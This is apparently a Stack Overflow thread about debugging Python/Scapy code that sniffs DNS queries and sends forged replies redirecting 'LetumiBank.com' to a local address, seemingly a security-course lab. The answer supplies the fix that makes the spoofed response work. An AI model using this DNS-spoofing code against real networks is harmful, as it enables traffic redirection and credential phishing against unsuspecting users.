# Why Python dns.resolver Doesn't Stop with Scapy's Sniff?

Tags: python, python-3.x, networking, dns, scapy

**Please Note, the provided answer doesn't solve the problem for me.**

In python I have:

```
resolver_ip = 127.0.0.2
resolver = dns.resolver.Resolver()
resolver.nameservers = [127.0.0.2] # IP of My DNS Server
# Query the DNS resolver for our hostname's IP
result = resolver.query("LetumiBank.com")
print('Bye')
```

I'm using python's scapy `sniff` function to detect whenever there is a DNS query to `127.0.0.2` to fake a response such that `WEBSITE_NAME` will get an ip equal to: `127.0.0.3`. My code was:

```
def sniff_and_spoof(source_ip):
    # TODO: Open a socket and bind it to the attacker's IP and WEB_PORT.
    # This socket will be used to accept connections from victimized clients.
    packet_filter = " and ".join([
        "udp dst port 53",  # Filter UDP port 53
        "udp[10] & 0x80 = 0",  # DNS queries only
        "dst host 127.0.0.2"
    ])
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket:
        client_socket.bind((source_ip, WEB_PORT))
        client_socket.listen()
        cb = lambda org_arg: dns_callback(org_arg, (client_socket, source_ip))
        sniff(filter=packet_filter, prn=cb, store=0, iface=net_interface, count=1)
```

and:

```
def dns_callback(packet, extra_args):
    # TODO: Write callback function for handling DNS packets.
    # Sends a spoofed DNS response for a query to HOSTNAME and calls handle_tcp_forwarding() after successful spoof.
    eth = Ether(
        src=packet[Ether].dst, dst=packet[Ether].src
    )

    ip = IP(
        src=packet[IP].dst, dst=packet[IP].src
    )

    udp = UDP(
        dport=packet[UDP].sport, sport=packet[UDP].dport
    )

    dns = DNS(
        id=packet[DNS].id, qd=packet[DNS].qd,
        aa=1, rd=0, qr=1, qdcount=1, ancount=1, nscount=0, arcount=0,
        ar=DNSRR(
            rrname=packet[DNS].qd.qname,
            type='A',
            ttl=600,
            rdata='127.0.0.3')
    )

    response_packet = eth / ip / udp / dns
    sendp(response_packet, iface=net_interface)
```

Even though I can see a good response in wireshark the query is being send over and over again and `Bye` doesn't seem to get ever printed. Why is that?

Wireshark output: (request in line 4 and its response in line 5)

[enter image description here](https://i.stack.imgur.com/4mk5B.jpg)

---

Keeping the code running gives the following error:

```
result = resolver.query("LetumiBank.com")
  File "/usr/lib/python3/dist-packages/dns/resolver.py", line 992, in query
    timeout = self._compute_timeout(start, lifetime)
  File "/usr/lib/python3/dist-packages/dns/resolver.py", line 799, in _compute_timeout
    raise Timeout(timeout=duration)
dns.exception.Timeout: The DNS operation timed out after 30.00104331970215 seconds
```

**UPDATE:**

Tried this too, same problem:

```
eth = Ether(src=packet[Ether].dst, dst=packet[Ether].src)

ip = IP(src=packet[IP].dst, dst=packet[IP].src)

udp = UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)

dns = DNS(
    id=packet[DNS].id,
    aa=1, rd=0, qr=1, qdcount=1, ancount=1, nscount=0, arcount=0,
    qd=DNSQR(  # Query
        qname=packet[DNSQR].qname
    ),
    an=DNSRR(  # Answer
        rrname=packet[DNS].qd.qname,
        type='A',
        rclass=1,
        ttl=600,
        rdata='127.0.0.3'
    )
)
```

Comment: Do the same query to a "normal" resolver and compare its reply to yours to find difference (with some excepted, such as the ID)

Comment: @PatrickMevzek in Wireshark not all flags are shows, Plus, my code was taken from external source. Update: I spent more 2 hours and tried multiple variations with no luck

Comment: @PatrickMevzek all examples include ttl=TTL but it's not defined (as pycharm says) maybe that's the issue? how can I use this TTL which import?

Comment: `TTL` is indeed a mandatory attribute of any DNS record in a reply. See RFC 1035 for DNS messages format, and especially for this §4.1.3 ; you don't need to bother with the specific on-wire format as Scapy does that for you, but you need to make sure to respect the model of data.

Comment: Why do you want to import `TTL`? What does that mean? The DNS TTL is an integer depicting how many seconds the content can be kept in cache by the client. As you are generating DNS packets to be sent to the client it is up to you to define the relevant TTL value to put.

Answer (score 0):

`ar=DNSRR()` is wrong in your call to `DNS()`.

Your answer should be in the `an` element. It is unfortunate Scapy uses such small names that are confusing.
You may also need a list because the sections, except the question, are storing multiple records, not just one.

So try `an=DNSRR(...)` or `an=[DNSRR(...)]` in your `DNS()` call.

A DNS packet can have up to 4 sections:

- a question, called `qd` in Scapy
- an answer, called  `an`,
- an authority, called `ns`
- an additional part, called `ar`

Your `ancount`/`arcount` are right though, so maybe just a typo?

By not sending really a reply (that is the "answer" part of the packet is empty, even if you do reply with a DNS packet") the client does not get an answer for its query and hence its normal behavior is to try to get back hopefully an answer.

Scapy documentation at https://scapy.readthedocs.io/en/latest/api/scapy.layers.dns.html shows this "RFC" like schema:

```
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|             LENGTH            |               ID              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Q| OPCODE|A|T|R|R|Z|A|C| RCODE |            QDCOUNT            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            ANCOUNT            |            NSCOUNT            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            ARCOUNT            |               QD              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|               AN              |               NS              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|               AR              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

                             Fig. DNS
```

Where the RFC 1035 has:

```
                                    1  1  1  1  1  1
      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      ID                       |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |QR|   Opcode  |AA|TC|RD|RA|   Z    |   RCODE   |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    QDCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    ANCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    NSCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    ARCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
```

for the header and

```
    +---------------------+
    |        Header       |
    +---------------------+
    |       Question      | the question for the name server
    +---------------------+
    |        Answer       | RRs answering the question
    +---------------------+
    |      Authority      | RRs pointing toward an authority
    +---------------------+
    |      Additional     | RRs holding additional information
    +---------------------+
```

for the whole packet.

So that explains at least why Answer=AN, Authority=NS and Additional=AR (I have to idea how the last two 2 letters monikers were chosen).

PS: regarding your comment about `ttl` that "doesn't work" without explanations on what the problem is, I don't see the problem you have (with Scapy 2.4.5):

```
>>> r=DNSRR(rrname='example.com', type='A', ttl=600, rdata='127.0.0.3')
>>> print(r)
WARNING: Calling str(pkt) on Python 3 makes no sense!
b'\x07example\x03com\x00\x00\x01\x00\x01\x00\x00\x02X\x00\x04\x7f\x00\x00\x03'
>>> r
<DNSRR  rrname='example.com' type=A ttl=600 rdata=127.0.0.3 |>
>>> r.ttl
600
```

Comment: Didn't work, kindly read my comments regarding TTL

Comment: What comments? There is nothing explained. "Didn't work" is not an explanation. Per the Scapy documentation the field is called `ttl` (you were using `TTL` at some point). Trying blindly in all directions until stumbling by chance on something that works may achieve the goal but doesn't really help to understand what is happening.

Comment: I did a lot of reading, please notice my update now, what's the problem with it?